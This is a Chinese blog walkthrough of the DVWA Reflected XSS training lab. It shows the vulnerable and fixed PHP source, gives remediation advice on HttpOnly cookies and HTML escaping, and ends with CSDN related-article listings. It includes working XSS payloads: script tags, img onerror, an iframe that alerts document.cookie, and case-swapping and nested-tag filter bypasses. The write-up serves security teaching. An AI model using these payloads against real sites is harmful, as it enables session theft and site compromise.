DVWA-XSS(Reflected)

最新推荐文章于 2024-05-02 03:17:24 发布
最新推荐文章于 2024-05-02 03:17:24 发布
阅读量613 收藏 1
点赞数 1
分类专栏: DVWA 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44866139/article/details/104123330
版权

反射型 XSS 是指应用程序直接将攻击者提交的具有恶意代码的数据回传浏览器,因 html 注入导致页面被植入恶意代码从而被攻击者控制浏览器

Low

1、查看服务器端源代码

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

2、查看客户端源代码

Vulnerability: Reflected Cross Site Scripting (XSS)

<div class="vulnerable_code_area">
	<form name="XSS" action="#" method="GET">
		<p>
			What's your name?
			<input type="text" name="name">
			<input type="submit" value="Submit">
		</p>

	</form>
	<pre>Hello kk</pre>
</div>
**值得注意的是,#将构造的payload注释掉了**
**应用程序直接将提交数据输出到 html 页面,未对提交数据做任何过滤检查和转义操作,可直接使用提交数据包含 xss payload 进行攻击**

3、构造payload

http://localhost/dvwa-master/vulnerabilities/xss_r/?name=kk<script>alert(1)</script>

利用hackbar
在这里插入图片描述
或者直接在文本框中输入攻击语句

显示cookie数据在这里插入图片描述

图像的替代文本
在这里插入图片描述

![在这里插入图片描述](https://img-blog.csdnimg.cn/2020013113372318.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDg2NjEzOQ==,size_16,color_FFFFFF,t_70) 重定向 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200131141635547.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDg2NjEzOQ==,size_16,color_FFFFFF,t_70) ![在这里插入图片描述](https://img-blog.csdnimg.cn/2020013114210612.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDg2NjEzOQ==,size_16,color_FFFFFF,t_70) **2、查看客户端源代码** ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200131142334630.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDg2NjEzOQ==,size_16,color_FFFFFF,t_70) **3、构造payload** 说明: 应用程序直接将提交数据中的 
<img src="" onerror="alert(/xss/)"/>

<iframe src="" onload="alert(document.cookie)"></iframe>

依然适用
还可以利用大小写变换

<Script>alert(/xss/)</sCRipt>

在这里插入图片描述
二次变化

<sc<script>ript>alert(/xss/)</script>

在这里插入图片描述

High

1、查看服务器端代码
直接输入
在这里插入图片描述
在这里插入图片描述
2、构造payload
说明:
应用程序直接将提交数据中的<script 字符串进行过滤后输出到 html 页面,但可以通过iframe、img 等标签进行绕过,从而成功利用漏洞
在这里插入图片描述

Impassible

修复建议:
a) 禁用 js 读取 cookie(设置 cookie 为 httponly)
b) 在页面输出数据时对<、>、&、 '、"、/等字符进行 html 实体转义
c) 对输入数据中<、>、&、 '、"进行严格检查

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Impossible级别的代码使用htmlspecialchars函数把预定义的字符&、”、 ’、<、>转换为HTML实体,防止浏览器将其作为HTML元素
tocken

一只小白来了
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA-XSS (Reflected)
qq_45751902的博客
04-25 280
目录简介安全级别:Low安全级别:Medium安全级别:Impossible防护总结 简介 XSS(cross-site scripting) 跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击; XSS可以盗取客户端cookie,将客户端重定向到第三方网站; 客户端脚本语言 弹窗警告、广告; JavaScript; 在浏览器中执行; XSS漏洞类型 存储型XSS;(持久型) 恶意代码被保存到目标网站的服务器中,每次用户访问时都会执
DVWA-XSS (Reflected)-反射型XSS
seanyang_的博客
06-12 3080
XSS攻击,是指攻击者在Web页面中输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页中。如果恶意JavaScript脚本被存储到后端服务器中,用户打开该Web页面时,恶意脚本则可能在浏览器中自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站中有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
DVWA-XSS 通关挑战
weixin_71090536的博客
08-27 209
此文章是XSS漏洞练习,靶场是 DVWAXSS分为反射型、存储型和DOM型,由于DOM型并不常见,故在此演示前两种类型的通关过程。
DVWA -XSS(Reflected)-通关教程-完结
刘箫-技术库
04-11 2232
XSS 攻击全称跨站脚本攻击。是指用户在 Web 页面中提交恶意脚本,从而使浏览包含恶意脚本的页面的用户在不知情的情况下执行该脚本,导致被攻击的行为。​ 与 SQL 注入类似,XSS 也是利用提交恶意信息来实现攻击效果的攻击行为。但是 XSS 一般提交的是 Javascript 脚本,运行在 Web 前端,也就是用户的浏览器;而 SQL 注入提交的SQL 指令是在后台数据库服务器执行。所以两者攻击的对象是不一样的。
DVWA -XSS(Stored)-通关教程-完结
刘箫-技术库
04-11 2531
XSS 攻击全称跨站脚本攻击。是指用户在 Web 页面中提交恶意脚本,从而使浏览包含恶意脚本的页面的用户在不知情的情况下执行该脚本,导致被攻击的行为。与 SQL 注入类似,XSS 也是利用提交恶意信息来实现攻击效果的攻击行为。但是 XSS 一般提交的是 Javascript 脚本,运行在 Web 前端,也就是用户的浏览器;而 SQL 注入提交的SQL 指令是在后台数据库服务器执行。所以两者攻击的对象是不一样的。
DVWA--XSS(Reflected)(全难度)
wwxxee
03-03 335
DVWAXSS(Reflected)(反射型XSS) 原理参考:网络安全笔记-99-渗透-XSS 逻辑 输入name,回显name 难度分级 Low 核心代码 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user
DVWA------XSS(全)
m0_65712192的博客
12-13 5164
DVWA-----XSS(全)
dvwaXSS(reflected
ANDTM的博客
06-07 391
XSS,全称Cross Site Scripting,即跨站脚本攻击,也相当于是一种代码注入攻击,hacker在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行。根据注入的恶意代码是否存储在服务器数据库中,XSS可以分为存储型的XSS与反射型的XSS,还有DOM型的XSS由于其特殊性,常常被分为第三种。SS利用的常见用途:盗取用户cookies、劫持会话、流量劫持、网页挂马、DDOS、提升权限…
DVWA-XSS(Reflected)Low Medium High低中高级别_dvwa靶场xss reflected 中级
最新发布
2401_84264583的博客
05-02 25
高级别利用正则表达式,过滤了
DVWA-command injection
weixin_44866139的博客
02-07 613
命令执行漏洞是指攻击者可以随意执行系统命令,属于高危漏洞之一,也属于代码执行的范畴。不仅存在一B/S架构中,也存在于C/S架构中。 OS命令执行漏洞:在windows和linux系统下,"&&"的作用是将两条命令连起来执行,此外,&、||、|符号同样也可以作为命令连接符使用,如net user ||set、net user | set、net user & set,...
DVWA-XSS(Stored)
weixin_44866139的博客
02-01 597
Low 直接输入 1、查看服务器端源代码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message...
DVWA-CSRF
weixin_44866139的博客
02-03 406
CSRF攻击原理 跨站请求伪造,听起来像XSS跨站脚本攻击,但攻击方式完全不同,CSRF更加难以防范,更具危险性。CSRF建立在会话之上,可以通过欺骗用户访问URL来实现。CSRF攻击是黑客借助受害者的Cookie骗取服务器的信任,但是黑客并不能获取到Cookie的内容,另外,由于浏览器同源策略的限制,黑客无法从返回的结果中得到任何东西,CSRF所能做到的就是给服务器发送请求。 任何web脚本语言...
DVWA-File Inclusion
weixin_44866139的博客
02-07 280
文件包含是指应用程序加载的文件(本地/远程)可以由用户提交的数据控制,从而导致攻击者控制恶意文件在服务器上执行. 对于php来说,常见的文件包含函数有如下: require:找不到被包含的文件,报错,并且停止运行脚本。 include:找不到被包含的文件,只会报错,但会继续运行脚本。 require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。 include_...
DVWA-Weak Session IDs
weixin_44866139的博客
02-10 249
用户访问服务器的时候,一般服务器都会分配一个身份证 session id 给用户,用于标识。用户拿到 session id 后就会保存到 cookies 上,之后只要拿着 cookies 再访问服务器,服务器就知道你是谁了。 但是 session id 过于简单就会容易被人伪造。根本都不需要知道用户的密码就能访问,用户服务器的内容了. Low cookies 上 dvwaSessionId +...
DVWA-File Upload
weixin_44866139的博客
02-10 196
文件上传是指攻击者通过上传可执行脚本功能,从而获取服务器端可执行命令的权限。 Low 1、查看服务器端源代码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/u...
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值